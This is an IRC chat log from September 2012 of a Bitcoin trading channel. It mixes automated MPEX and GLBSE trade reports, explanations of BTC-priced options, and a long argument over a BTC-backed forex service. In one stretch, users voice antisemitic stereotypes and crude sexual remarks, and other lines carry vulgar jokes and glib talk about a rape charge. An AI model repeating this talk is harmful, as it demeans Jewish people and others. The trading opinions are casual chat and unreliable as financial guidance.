BTC [+] Sep 06 04:19:40 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:42 mrchhre? Sep 06 04:19:42 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:44 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:50 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:52 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:53 [GLBSE] [PAJKA.BOND] 3 @ 0.084 = 0.252 BTC [+] Sep 06 04:19:55 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:19:56 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:20:01 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:20:03 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:20:07 pajka combo breaker Sep 06 04:20:12 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:20:16 [GLBSE] [ASICMINER] 1 @ 0.1171 BTC [+] Sep 06 04:20:19 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:20:21 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:20:23 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:20:31 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:20:33 [MPEX] [B.MPCD.C] 10000 @ 0.00102096 = 10.2096 BTC [+] Sep 06 04:20:39 [MPEX] [O.BTCUSD.P160T] 2 @ 0.64514775 = 1.2903 BTC [-] Sep 06 04:20:41 [MPEX] [B.MPCD.C] 10000 @ 0.00102183 = 10.2183 BTC [+] Sep 06 04:21:18 [MPEX] [S.MPOE] 400 @ 0.00040041 = 0.1602 BTC [+] Sep 06 04:21:54 Well, some people like certified deposits Sep 06 04:22:15 BTC-Mining what you mean cap ? Sep 06 04:22:55 http://en.wikipedia.org/wiki/Cap Sep 06 04:23:46 o o o yes hehe, a cap! Sep 06 04:24:10 [GLBSE] [ASICMINER] 33 @ 0.12 = 3.96 BTC [+] Sep 06 04:24:13 hm, does anyone make btc aparel ? Sep 06 04:24:31 as in, aparel you pay in btc Sep 06 04:24:39 i can spraypaint something for you Sep 06 04:24:42 [GLBSE] [ASICMINER] 1 @ 0.11999999 BTC [-] Sep 06 04:24:43 designer Sep 06 04:24:47 $1000 Sep 06 04:25:21 (Pssst! Sounds like a pretty bad deal... You should take it.) Sep 06 04:25:38 dude i'm trying to let you guys in on the ground floor Sep 06 04:26:05 designer bitcoin apparel Sep 06 04:26:15 pink kicks with gold coins on them Sep 06 04:26:26 lol Sep 06 04:26:33 romney's tax return airbrushed on a polo in graffiti Sep 06 04:26:38 this shit is hot Sep 06 04:26:50 Hmm, an exclusive fashion milieu, quite the interesting offer indeed. Sep 06 04:27:03 cascius coin dildos Sep 06 04:27:30 who needs a vault Sep 06 04:27:48 when you got kegels ? Sep 06 04:28:00 Sweden drops Assange rape charge Sep 06 04:28:06 [GLBSE] [YABMC] 5 @ 0.119 = 0.595 BTC [+] Sep 06 04:28:07 lmao a loser is sweden. Sep 06 04:28:08 [GLBSE] [YABMC] 3 @ 0.11949 = 0.3585 BTC [+] Sep 06 04:28:09 [GLBSE] [YABMC] 50 @ 0.1195 = 5.975 BTC [+] Sep 06 04:28:27 Hey Diablo-D3 Sep 06 04:28:28 so if you are popular enough rape is ok in sweden? Sep 06 04:28:36 he didn't rape anybody. Sep 06 04:28:38 or unpopular enough Sep 06 04:28:57 i'm sorry assange doesn't qualify as world news Sep 06 04:29:20 Maybe there was simply a lack of proof plus getting assange was too hard, so dropped charges... costs money to work on the case you know... Sep 06 04:29:43 Getting proof tends to be hard in case of rape. Sep 06 04:29:54 maybe it was just a case of rogue state trying to abuse the process of law to kidnap foreign nationals Sep 06 04:29:55 isn't illegal in spain to walk into a car dealer with 3000 euros and ppurchase a vehicle Sep 06 04:29:59 that's what my 2 bitcents is on anyway Sep 06 04:30:05 [MPEX] [S.MPOE] 15534 @ 0.00040084 = 6.2266 BTC [+] Sep 06 04:30:06 [MPEX] [S.MPOE] 33366 @ 0.00040148 = 13.3958 BTC [+] Sep 06 04:31:00 [GLBSE] [JTME] 2 @ 0.899 = 1.798 BTC [+] Sep 06 04:31:01 [GLBSE] [JTME] 4 @ 0.9 = 3.6 BTC [+] Sep 06 04:31:26 < mircea_popescu> maybe it was just a case of rogue state trying to abuse the process of law to kidnap foreign nationals<<< sounds like the 'merican way Sep 06 04:31:43 myea. Sep 06 04:31:47 yes america runs the world Sep 06 04:31:53 lol. get off. Sep 06 04:31:59 no seriously Sep 06 04:32:03 right. Sep 06 04:32:14 most 2yos think they run the world too. Sep 06 04:32:19 i've been to the world, i know. Sep 06 04:32:34 lol srsly ? Sep 06 04:32:40 how's the world's apartment like ? Sep 06 04:32:44 does it have ac ? Sep 06 04:32:51 no running water Sep 06 04:33:03 so why ruin it. Sep 06 04:33:05 no sewage, only septic Sep 06 04:34:04 http://www.washingtontimes.com/news/2012/sep/3/the-real-fiscal-cliff/ Sep 06 04:35:35 doomand gloom Sep 06 04:36:19 http://www.ritholtz.com/blog/wp-content/uploads/2009/11/world-accordign-to-USA.jpg Sep 06 04:36:45 looks correct Sep 06 04:36:53 ;;ticker Sep 06 04:36:53 Best bid: 10.903, Best ask: 10.9999, Bid-ask spread: 0.09690, Last trade: 10.91592, 24 hour volume: 64318, 24 hour low: 10.261, 24 hour high: 11.17 Sep 06 04:37:49 This one is a bit outdated... looks like its from the cold war Sep 06 04:37:51 http://3.bp.blogspot.com/_oUc6WpOAwto/SP9fNq6zuOI/AAAAAAAABOs/t2o45sOf_sw/s1600/the_world_according_to_america.gif Sep 06 04:38:32 [GLBSE] [ASICMINER] 33 @ 0.1130002 = 3.729 BTC [-] Sep 06 04:39:27 [MPEX] [S.MPOE] 16434 @ 0.00040148 = 6.5979 BTC [+] Sep 06 04:39:29 [MPEX] [S.MPOE] 5078 @ 0.00040313 = 2.0471 BTC [+] Sep 06 04:39:30 [MPEX] [S.MPOE] 8488 @ 0.00040475 = 3.4355 BTC [+] Sep 06 04:40:17 [GLBSE] [ASICMINER] 30 @ 0.12 = 3.6 BTC [+] Sep 06 04:40:52 [GLBSE] [NYAN.A] 47 @ 1 = 47 BTC [+] Sep 06 04:42:35 [MPEX] [S.MPOE] 32200 @ 0.00040041 = 12.8932 BTC [-] Sep 06 04:43:40 [MPEX] [B.MPCD.A] 10000 @ 0.00100595 = 10.0595 BTC [+] Sep 06 04:43:42 [MPEX] [B.MPCD.B] 10000 @ 0.00100893 = 10.0893 BTC [+] Sep 06 04:49:35 is something stuck <<< i love this line Sep 06 04:49:57 i guess the power of lisp is a scary thing to behold. just you wait till i grow a little and start doing 100s of trades a minute Sep 06 04:50:37 [GLBSE] [ASICMINER] 33 @ 0.12 = 3.96 BTC [+] Sep 06 04:50:44 The thing is, it was like tons of 10 BTC trades, all in the same amount at the same price... Sep 06 04:50:54 Why weren't they all filled in one go? Sep 06 04:52:02 [GLBSE] [ASICMINER] 20 @ 0.113 = 2.26 BTC [-] Sep 06 04:52:03 [GLBSE] [ASICMINER] 4 @ 0.112 = 0.448 BTC [-] Sep 06 04:52:42 [MPEX] [S.MPOE] 21651 @ 0.00040475 = 8.7632 BTC [+] Sep 06 04:53:30 BTC-Mining what do you mean "in one go" ? Sep 06 05:00:24 [MPEX] [B.MPCD.B] 24812 @ 0.00100757 = 24.9998 BTC [-] Sep 06 05:00:50 O.BTCUSD.C200N what is the strick price usd20 or usd200? Sep 06 05:02:18 usd 20 Sep 06 05:04:52 if i want to buy 1 btc, i should pay USD0.089 or 0.089BTC? Sep 06 05:06:02 [GLBSE] [OBSI.HRPT] 1 @ 0.103498 BTC [-] Sep 06 05:06:31 [GLBSE] [ASICMINER] 33 @ 0.11000001 = 3.63 BTC [-] Sep 06 05:06:55 papaso: it's priced in btc Sep 06 05:07:21 [GLBSE] [ASICMINER] 3 @ 0.114 = 0.342 BTC [+] Sep 06 05:07:51 papaso each option stands for 1 btc and is priced in btc. Sep 06 05:08:44 O.BTCUSD.C200N is 0.00608060 ask and 0.14836642 buy Sep 06 05:08:47 this means it costs you Sep 06 05:08:56 ;;ticker Sep 06 05:08:57 Best bid: 10.94, Best ask: 10.94992, Bid-ask spread: 0.00992, Last trade: 10.931, 24 hour volume: 69377, 24 hour low: 10.261, 24 hour high: 11.17 Sep 06 05:09:13 .py 10.931 * 0.00608060 Sep 06 05:09:13 0.0664670386 Sep 06 05:09:18 it costs you about 6.6 cents. Sep 06 05:09:24 means the price is not usd it is btc? Sep 06 05:09:28 yes. Sep 06 05:09:34 good Sep 06 05:09:42 all mpex is btc-only. no usd anywhere. Sep 06 05:10:08 if i buy there must have another trader as sell side Sep 06 05:10:51 there's the mpoe bot which takes your other side. Sep 06 05:12:09 O.BTCUSD.C200N the Expiration is? Sep 06 05:12:41 it is europen-option or us-option? Sep 06 05:12:46 [GLBSE] [M.ETF] 2 @ 0.125 = 0.25 BTC [+] Sep 06 05:12:53 us. Sep 06 05:12:59 you can sell it at any time anyway, the bot quotes. Sep 06 05:13:44 all T expire last Friday of current month (28th). all N expire last Friday of next month (oct 26th) Sep 06 05:14:09 [GLBSE] [ASICMINER] 1 @ 0.114 BTC [+] Sep 06 05:14:21 O.BTCUSD.C200N is this mouth or next mouth Sep 06 05:14:35 next month. Sep 06 05:14:40 cause of N at the end Sep 06 05:15:03 next mouth 28th? Sep 06 05:15:59 do you have dec 28 Contract Sep 06 05:16:13 next month 26th. Sep 06 05:16:22 and no, no december. only current and next month. Sep 06 05:16:56 december will be N starting on the 27th of october. Sep 06 05:17:22 OK, i wish if the volme is high, people can buy year contract Sep 06 05:17:46 [GLBSE] [ASICMINER] 5 @ 0.11999 = 0.6 BTC [+] Sep 06 05:17:48 [GLBSE] [ASICMINER] 28 @ 0.12 = 3.36 BTC [+] Sep 06 05:18:09 not a problem of volume as much as volatility. Sep 06 05:18:18 btc can and has dropped and gained 50-60% in a few days. Sep 06 05:18:22 [GLBSE] [ASICMINER] 20 @ 0.11998999 = 2.3998 BTC [-] Sep 06 05:18:27 this precludes any LEAPs or such. Sep 06 05:20:27 last month volume was ~100k contracts, you can look it up in the monthly report http://trilema.com/2012/mpoe-rezultate-august-2012/#comment-88317 Sep 06 05:21:03 [GLBSE] [MMM] 7 @ 1 = 7 BTC [+] Sep 06 05:22:14 [GLBSE] [MMM] 6 @ 1 = 6 BTC [+] Sep 06 05:22:40 Freeroll starting in 10 minutes. Ready smickles? Sep 06 05:22:49 im off to bed. gl boyz Sep 06 05:23:03 Night there **** BEGIN LOGGING AT Thu Sep 6 17:56:58 2012 Sep 06 17:57:12 *manage Sep 06 17:57:36 sooo, how's the poker boys ? BTC-Mining ? smickles ? Sep 06 17:57:41 well thats up to you, this is made to make btc Sep 06 17:57:42 not usd Sep 06 17:57:44 directly Sep 06 17:57:58 mircea_popescu, you would be the one to be able to answer this... Sep 06 17:58:01 [10:53] smickles, kako is saying you could have a BTC balance, and have a USD/EUR position for it, so if you lose 10% on the position, you lose 10% oF the BTC used for the position. AND COMPLETLY IGNORE BTC PRICE FLUCTUATION DURING THAT TIME. That's what I understood. Sep 06 17:58:01 [10:53] volatility of eur/usd is 1/50 maybe of btc/usd:) Sep 06 17:58:01 [10:53] thats why you have leverages Sep 06 17:58:01 [10:54] BTC-Mining: CORRECT Sep 06 17:58:12 How can that work? Sep 06 17:58:27 that's the point Sep 06 17:58:35 "AND COMPLETLY IGNORE BTC PRICE FLUCTUATION DURING THAT TIME" Sep 06 17:58:47 BTC-Mining well part of your btc would be in options. Sep 06 17:59:00 then if price fluctuates you make back btc so that your usd value stays fixed. Sep 06 17:59:06 So there must be hedging Sep 06 17:59:09 well yes. Sep 06 17:59:27 http://polimedia.us/btcf/viewtopic.php?f=8&t=10 i strongly recomend this thread Sep 06 17:59:35 it has 3-4 good case studies well documented. Sep 06 18:00:00 That's also what my understanding of the forex was. Sep 06 18:00:26 But hedging has a cost... Sep 06 18:00:45 everything has a cost. Sep 06 18:01:13 Kako, could you verify that with your forex contact? Sep 06 18:01:22 [GLBSE] [BITBOND] 1 @ 0.4 BTC [+] Sep 06 18:01:38 maybe that forex contact doesnt imagine how much wild are swings at mtgox:) Sep 06 18:01:42 So he can confirm you or something? Sep 06 18:01:53 I think that might be the problem, Enky Sep 06 18:01:59 i told you how your funds are backed Sep 06 18:02:07 he think, btc is a currency , so not much volatile... Sep 06 18:02:13 big mistakes:) Sep 06 18:02:33 kako, BTC price fluctuations will matter... Sep 06 18:03:13 i think what you really need to worry Sep 06 18:03:29 there's no way it wouldn't if it's the currency backing the position. Sep 06 18:03:30 if there is enough btc to cover your gains Sep 06 18:03:36 to which the answer is: yes Sep 06 18:03:49 what are you folks discussing anyway ? Sep 06 18:04:44 Enky see pm about the demo Sep 06 18:04:54 kakobrekla wants to make a BTC > fiat/fiat positions service with BTC backing the position. BUT, of course, BTC price fluctuation doesn't need hedging or doesn't matter at all in this. Sep 06 18:05:27 so basically, allow you to trade on a forex platform by keeping your BTC to back your positions. Sep 06 18:05:48 But somehow BTC/fiat value doesn't matter at all in this Sep 06 18:05:59 you can mitigate the problem limiting your operativity to intraday operations, for example, another idea Sep 06 18:06:21 hm. well that could be risky. Sep 06 18:06:29 for Kako, yes? Sep 06 18:06:35 if anyone cares, an attempt at btc / difficulty option nearly took a large player out. Sep 06 18:06:40 last month. Sep 06 18:07:02 significant losses. and when i say "large player" i mean 10's of k's. Sep 06 18:07:09 I kept saying he needs to hedge or he might make big losses (or gains) Sep 06 18:07:28 depending on bitcoin price fluctuations and if the users make gains or losses. Sep 06 18:07:56 BTC-Mining if he imediately trades (ie, customer buys btc on platform, platform buys btc on mtgox, and vice-versa) and the sums are small enough it should be ok Sep 06 18:08:10 no Sep 06 18:08:13 as the sums grow i imagine it'd end up as bitcoinica. Sep 06 18:08:21 ie, making a loss each month. Sep 06 18:08:26 that's no what he's saying Sep 06 18:08:52 he's saying that you could put a 1 BTC balane he'd keep on his side. Sep 06 18:08:55 well i kinda fell in the middle of a discussion i dunno. Sep 06 18:09:22 and allow you to take a USD/EUR short/long position on a forex platform using that BTC. Sep 06 18:09:48 and suppose you use 1:1 leverage, and make 10% loss/gain, you make 10% loss/gain on your BTC. Sep 06 18:10:19 AND, BTC/FIAT price WOULDN'T matter AT ALL in this, somehow. Sep 06 18:10:35 this doesn't sound like the whole story. Sep 06 18:10:46 mircea_popescu: not suprising about the btc/diff option, the bot didn't seem to understand the relationship between btc/usd price rising and diff rising Sep 06 18:11:09 smickles funny thing is, it had done ok the first coupla months. Sep 06 18:11:14 mircea, it is the whole story Sep 06 18:11:27 very tracherous market, easy enough to gain a false sense of confidence. Sep 06 18:12:14 mircea_popescu: in hindsight, the first few months were like the eye of a huricane Sep 06 18:12:20 i guess lol Sep 06 18:12:22 and to me it makes absolutly zero sense Sep 06 18:12:35 BTC-Mining well that's why i say can't be the whole story. Sep 06 18:12:46 but the thing is, it is! Sep 06 18:12:52 lol how do you know that ? Sep 06 18:13:09 and anyway! let's not deviate from the main topic! who won the poker tourney ? Sep 06 18:13:14 I was there since the start Sep 06 18:13:22 Not me or smickles ;) Sep 06 18:13:28 give the addy Sep 06 18:13:29 1GG36DGeSYrZULtRTRoZwqMSupKtLeBjjF <<< donations accepted. Sep 06 18:14:37 I wonder if a chick has ever said "dick licking good" Sep 06 18:14:49 .......... Sep 06 18:15:52 geee, i made money while sleeping! Sep 06 18:15:57 and yes Diablo-D3, a chick has. Sep 06 18:16:19 but seriously Kakobrekla, I suggest you talk that again with your contact, because something seems to be very awry and amiss in those statements. Sep 06 18:16:32 [GLBSE] [BFLS.RIG] 1 @ 0.91 BTC [+] Sep 06 18:16:37 Would carry a huge risk for you depending on BTC price fluctuations. Sep 06 18:16:48 zomg Sep 06 18:16:50 another pirate?1 Sep 06 18:17:24 No Sep 06 18:17:26 This: Sep 06 18:17:28 [10:53] smickles, kako is saying you could have a BTC balance, and have a USD/EUR position for it, so if you lose 10% on the position, you lose 10% oF the BTC used for the position. AND COMPLETLY IGNORE BTC PRICE FLUCTUATION DURING THAT TIME. That's what I understood. Sep 06 18:17:28 [10:53] volatility of eur/usd is 1/50 maybe of btc/usd:) Sep 06 18:17:29 [10:53] thats why you have leverages Sep 06 18:17:29 [10:54] BTC-Mining: CORRECT Sep 06 18:18:22 If someone makes a loss on his position (fiat loss) and BTC devalues/crash to like close to 0, guess who absorbs the large fiat loss? Sep 06 18:18:44 the... investor? Sep 06 18:19:32 No, if the position loses 10%, the forex trader loses 10% in bitcoin backing it at time of getting the position. Sep 06 18:19:45 That seems to be what Kako is saying. Sep 06 18:19:54 Enky> volatility of eur/usd is 1/50 maybe of btc/usd: <<< more than that. Sep 06 18:19:59 but thats not really true Sep 06 18:20:00 [MPEX] [F.GIGA.ETF] 16600 @ 0.00085667 = 14.2207 BTC [-] Sep 06 18:20:03 btc/usd went -50% then +40% in 4 days. Sep 06 18:20:09 because thats not how forex work Sep 06 18:20:24 That's what I'm trying to tell him x( Sep 06 18:20:31 Huge risks for him. Sep 06 18:20:49 Especially with 1:1000 leverage to top it. Sep 06 18:20:49 I mean, mtgox is a forex Sep 06 18:20:59 Indeed. Sep 06 18:21:26 btw, you cant hedge btc/usd valuations owning paper Sep 06 18:21:30 you have to own the real thing Sep 06 18:21:43 same goes for those people who buy GLD on wall street Sep 06 18:21:51 you want real gold in a vault, not GLD Sep 06 18:22:00 real gold is expensive to maintain. Sep 06 18:22:16 you need a jew to maintain your gold Sep 06 18:22:20 its in thier blood Sep 06 18:22:20 rg: basically. Sep 06 18:22:21 lol Sep 06 18:22:28 im dead serious.. Sep 06 18:22:29 Im not even going to claim thats racist Sep 06 18:22:34 its 100% true Sep 06 18:22:34 all jewelry/gold places around here Sep 06 18:22:39 are jewish owned Sep 06 18:22:39 you need three jews in your life Sep 06 18:22:43 a doctor, a lawyer, and an accountant Sep 06 18:22:47 oh yeah mircea_popescu did you get my later tell? Sep 06 18:22:55 no, actually, teeny jew chicks are great fucks. Sep 06 18:22:56 jewish doctor? Sep 06 18:22:57 meh Sep 06 18:22:59 indian doctor Sep 06 18:23:00 where should i send that .01 btc? Sep 06 18:23:01 more likely Sep 06 18:23:13 smickles ^^ Sep 06 18:23:18 1GG36DGeSYrZULtRTRoZwqMSupKtLeBjjF <<< donations accepted. Sep 06 18:23:30 heh, sending soon then :) Sep 06 18:24:54 i see a .01 but not a .02. BTC-Mining! whar is my dough! kneecaps! Sep 06 18:25:14 man Sep 06 18:25:19 I should watc the clinton speech again Sep 06 18:25:58 aha! ty. Sep 06 18:26:20 See, just wait a little for to show up =/ Sep 06 18:26:26 I sent it like 5 minutes ago Sep 06 18:26:33 i would vote for clinton Sep 06 18:26:36 if he could run again Sep 06 18:27:17 vote for obama then Sep 06 18:27:24 no Sep 06 18:27:26 its clinton now available for black Sep 06 18:27:26 i dont like obama Sep 06 18:29:01 what about bush Sep 06 18:29:07 did u forget bush Sep 06 18:29:28 i hate gwb Sep 06 18:29:31 but if i was president Sep 06 18:29:33 id robably be likle him Sep 06 18:29:43 dude Sep 06 18:29:47 if I was president Sep 06 18:29:48 first thing I do Sep 06 18:30:07 write everyone a $25k check. Sep 06 18:30:17 BTC-Mining :p Sep 06 18:30:21 under the strict orders they pay off anybody they owe first Sep 06 18:30:24 whatever is left they can spend Sep 06 18:30:25 bush is a party animal Sep 06 18:30:28 Diablo-D3: why stop there? Sep 06 18:30:32 I want $2.5M Sep 06 18:30:37 and then watch the banks twist and spin as they cant claim they're not solvent Sep 06 18:30:47 ahaha Diablo-D3 is evil. Sep 06 18:30:48 since half their debt just evaporated Sep 06 18:31:02 man, that'd collapse every major bank Sep 06 18:31:04 it'd be hillarious Sep 06 18:31:16 well it wouldn't be hilarious if YOU were president. Sep 06 18:31:23 mircea_popescu: yes it would Sep 06 18:31:27 I wouldnt have to bail them out Sep 06 18:31:33 go down in history as "the guy who destroyed the banks" ? what are you jefferson ? Sep 06 18:31:40 mircea_popescu: I said major Sep 06 18:31:47 all the minor banks are healthy by any metric Sep 06 18:31:55 you know minors are illegal in most states. Sep 06 18:32:03 [MPEX] [S.MPOE] 2700 @ 0.00040102 = 1.0828 BTC [+] Sep 06 18:32:05 I said miner Sep 06 18:32:10 banks for the mining industry Sep 06 18:32:21 Wait what!? Sep 06 18:36:32 [GLBSE] [ASICMINER] 20 @ 0.1209 = 2.418 BTC [+] Sep 06 18:38:17 [GLBSE] [TYGRR.BOND-P] 15 @ 0.08 = 1.2 BTC [-] Sep 06 18:38:18 [GLBSE] [TYGRR.BOND-P] 1 @ 0.0797632 BTC [-] Sep 06 18:38:20 [GLBSE] [TYGRR.BOND-P] 2 @ 0.0795672 = 0.1591 BTC [-] Sep 06 18:38:21 [GLBSE] [TYGRR.BOND-P] 1 @ 0.079456 BTC [-] Sep 06 18:38:22 [GLBSE] [TYGRR.BOND-P] 1 @ 0.079392 BTC [-] Sep 06 18:38:23 [GLBSE] [TYGRR.BOND-P] 1 @ 0.07921921 BTC [-] Sep 06 18:38:24 [GLBSE] [TYGRR.BOND-P] 50 @ 0.0701 = 3.505 BTC [-] Sep 06 18:38:25 [GLBSE] [TYGRR.BOND-P] 20 @ 0.064 = 1.28 BTC [-] Sep 06 18:38:26 [GLBSE] [TYGRR.BOND-P] 10 @ 0.061 = 0.61 BTC [-] Sep 06 18:38:27 [GLBSE] [TYGRR.BOND-P] 1 @ 0.06 BTC [-] Sep 06 18:38:28 [GLBSE] [TYGRR.BOND-P] 1 @ 0.05601337 BTC [-] Sep 06 18:38:29 [GLBSE] [TYGRR.BOND-P] 100 @ 0.051 = 5.1 BTC [-] Sep 06 18:38:30 [GLBSE] [TYGRR.BOND-P] 1 @ 0.05050505 BTC [-] Sep 06 18:38:32 [GLBSE] [TYGRR.BOND-P] 100 @ 0.05010001 = 5.01 BTC [-] Sep 06 18:38:33 [GLBSE] [TYGRR.BOND-P] 50 @ 0.0501 = 2.505 BTC [-] Sep 06 18:38:33 [GLBSE] [TYGRR.BOND-P] 120 @ 0.05 = 6 BTC [-] Sep 06 18:38:34 [GLBSE] [TYGRR.BOND-P] 1 @ 0.05 BTC [-] Sep 06 18:38:35 [GLBSE] [TYGRR.BOND-P] 1 @ 0.04040404 BTC [-] Sep 06 18:38:36 [GLBSE] [TYGRR.BOND-P] 1 @ 0.04 BTC [-] Sep 06 18:38:37 [GLBSE] [TYGRR.BOND-P] 23 @ 0.04 = 0.92 BTC [-] Sep 06 18:38:47 damn Sep 06 18:39:44 TYGRR.BOND-P is reaching acceptable valuation (0) Sep 06 18:39:51 heee Sep 06 18:42:53 [GLBSE] [OBSI.HRPT] 1 @ 0.10349954 BTC [-] Sep 06 18:43:50 [GLBSE] [FPGAMINING] 2 @ 0.78011 = 1.5602 BTC [+] Sep 06 18:43:52 [GLBSE] [FPGAMINING] 5 @ 0.7801 = 3.9005 BTC [-] Sep 06 18:43:53 [GLBSE] [FPGAMINING] 10 @ 0.78 = 7.8 BTC [-] Sep 06 18:43:54 [GLBSE] [FPGAMINING] 1 @ 0.75 BTC [-] Sep 06 18:43:56 [GLBSE] [FPGAMINING] 4 @ 0.74521 = 2.9808 BTC [-] Sep 06 18:43:57 [GLBSE] [FPGAMINING] 18 @ 0.7452 = 13.4136 BTC [-] Sep 06 18:45:16 i wonder how many speculators had bought it at .1 Sep 06 18:45:25 because "who knows". Sep 06 18:46:39 Many, just like previously many were buying at 0.3 - 0.7 Sep 06 18:46:49 Just keeps going down Sep 06 18:48:34 a well, they say no lesson is worth anything unless you have a missing eye to show for it. Sep 06 18:50:02 [MPEX] [B.MPCD.A] 39784 @ 0.00100543 = 40 BTC [-] Sep 06 18:52:34 [GLBSE] [ASICMINER] 13 @ 0.1209 = 1.5717 BTC [+] Sep 06 18:52:36 [GLBSE] [ASICMINER] 31 @ 0.121 = 3.751 BTC [+] Sep 06 18:52:38 [GLBSE] [ASICMINER] 54 @ 0.122 = 6.588 BTC [+] Sep 06 18:53:39 mircea_popescu: lawls Sep 06 18:53:46 EskimoBob has like four missing eyes Sep 06 18:54:21 o, he learned something yet ? Sep 06 18:54:35 yeah, he now thinks I ran off with the money Sep 06 18:54:43 and bought a house in the Caymans Sep 06 18:55:11 im pretty sure the doods that traded stocks with you are the ones with the house in the caymans Sep 06 18:55:20 [MPEX] [F.GIGA.ETF] 6300 @ 0.00086667 = 5.46 BTC [+] Sep 06 18:55:25 nope Sep 06 18:55:57 btc mining you there? Sep 06 18:56:20 BTC-Mining ping Sep 06 18:56:40 ping pong... Sep 06 18:56:44 [GLBSE] [OBSI.HRPT] 3 @ 0.10349954 = 0.3105 BTC [-] Sep 06 18:56:50 hes away for about 10min Sep 06 18:57:10 aniway i'm a fucking dumb kako:) Sep 06 18:57:22 mircea_popescu: see, what he doesnt get is Im playing the long game Sep 06 18:57:32 15 years ago i would have understood on the fly not after 3 hours:) Sep 06 18:57:46 yes? Sep 06 18:57:57 i've undestood how it works Sep 06 18:58:03 finally Sep 06 18:58:08 :D Sep 06 18:58:18 it's simple Sep 06 18:58:21 it is direct Sep 06 18:58:23 [GLBSE] [NYAN.C] 9 @ 0.649 = 5.841 BTC [+] Sep 06 18:58:24 [GLBSE] [NYAN.C] 50 @ 0.65 = 32.5 BTC [+] Sep 06 18:58:30 example: Sep 06 18:58:40 100 bts account for 0.1 lots and 10 to 1 leverage for example Sep 06 18:59:16 so i open eur/usd with 0.1 lots at 1.2500 and it goes to 1.2600 Sep 06 18:59:21 100 pips Sep 06 18:59:41 or 0.8% Sep 06 18:59:46 you earn 0.8% plus leverage Sep 06 18:59:59 in this case 10 to 1 or 8% or 8 btc Sep 06 19:00:13 100 btc initial value + 8% of profit Sep 06 19:00:18 that's all:) Sep 06 19:00:19 no conversion Sep 06 19:00:41 you earn +8% on the EURO amount! Sep 06 19:00:45 no btc Sep 06 19:00:57 100 btc = 0.1 lots Sep 06 19:01:08 dongs Sep 06 19:01:12 you never convert Sep 06 19:01:23 there are not euro amount Sep 06 19:01:27 only % of profit Sep 06 19:01:32 in units Sep 06 19:01:36 in this case btc Sep 06 19:02:03 you do 20% ? ok you earn 20% for each 100 btc or 0.1 lots:) Sep 06 19:02:12 [GLBSE] [NYAN.C] 100 @ 0.7 = 70 BTC [+] Sep 06 19:02:16 but you're having a fucking eur/usd position! How can you do that without a eur balance >.< Sep 06 19:02:22 it's your problem Sep 06 19:02:32 to hedge it Sep 06 19:02:37 if you want to hedge it Sep 06 19:03:05 it's never in euro Sep 06 19:03:29 No, it's Kako's problem, because he runs the fiat balance for you, but he says no hedging... Sep 06 19:03:40 he accepts only btc Sep 06 19:03:58 it's unlinked Sep 06 19:04:15 Then WHO PAYS for the position??? Sep 06 19:04:16 basically it follows profit in % Sep 06 19:04:19 never in currency Sep 06 19:04:31 and add that % to your account Sep 06 19:04:39 or subtract if you have a loss Sep 06 19:04:52 totally unlinked from the btc/usd volatility at mtgox Sep 06 19:05:04 Where does the profit comes from if you NEVER actually had the fiat currency for the position?? Sep 06 19:05:19 probably from a trader that did the opposite trade Sep 06 19:05:20 And if you make a profit, how do you buy the extra BTC to pay such profit? Sep 06 19:05:25 as happens regularly on any forex broker Sep 06 19:05:49 No, that's not what Kako said he wanted to do... Sep 06 19:06:25 i understood that Sep 06 19:06:28 wanted to do what Sep 06 19:07:04 if is it unlinked who pay a profit in btc to a guy that never held a position in fiat currency? Sep 06 19:07:10 Enky claims a position will have to be matched with an opposite position also using BTC Sep 06 19:07:18 no Sep 06 19:07:19 my guess btc Sep 06 19:07:32 See, that's not what kako wants to do... Sep 06 19:07:50 any matchin or whatever is done by metatrader Sep 06 19:07:58 by the firm then Sep 06 19:07:59 yes, in fiat... Sep 06 19:08:24 so profit/loss is in fiat Sep 06 19:08:28 you can trade any pair Sep 06 19:08:32 you make profits in btc Sep 06 19:08:42 or in units Sep 06 19:08:46 if its less disturbing Sep 06 19:08:49 so the broker take the risk of potential large movement in the btc/usd ratio Sep 06 19:08:54 so if BTC price changes during the position, it DOES matter Sep 06 19:09:08 it does not matter for you, the customer for what i've understood Sep 06 19:09:21 not for the customer, but for Kako, it does Sep 06 19:09:23 you had you money with pirate with 7% a week no matter if the usd btc price was 5 or 10 usd Sep 06 19:09:32 ok for the customer is ok Sep 06 19:09:52 but for the broker not, but most of the time orders tend to match each other, if there are a large amount of traders Sep 06 19:10:04 but that is done internally Sep 06 19:10:10 [GLBSE] [OBSI.HRPT] 264 @ 0.10349954 = 27.3239 BTC [-] Sep 06 19:10:11 im a goat mother fuckers! Sep 06 19:10:11 [GLBSE] [OBSI.HRPT] 109 @ 0.1035 = 11.2815 BTC [+] Sep 06 19:10:11 we dont have any control over what MT4 does Sep 06 19:10:14 inside Sep 06 19:10:16 their systems Sep 06 19:10:38 that broker firm isnt small, probably they can handle few users in bitcoin Sep 06 19:11:47 ok the mystery is resolved:) Sep 06 19:12:38 kako, you don't seem to understand you're making a profit on a position in FIAT. If you make a 10% (1 USD on 10 USD, for 1 BTC) profit in fiat but bitcoins value raises 10x in USD value during that time (100 USD). Your 1 USD will pay only for 1% extra in bitcoin, not 10%. Either you or MT4 would have to eat a damn loss to give that full 10%. Sep 06 19:12:44 so its bitcoinica rehash. Sep 06 19:12:47 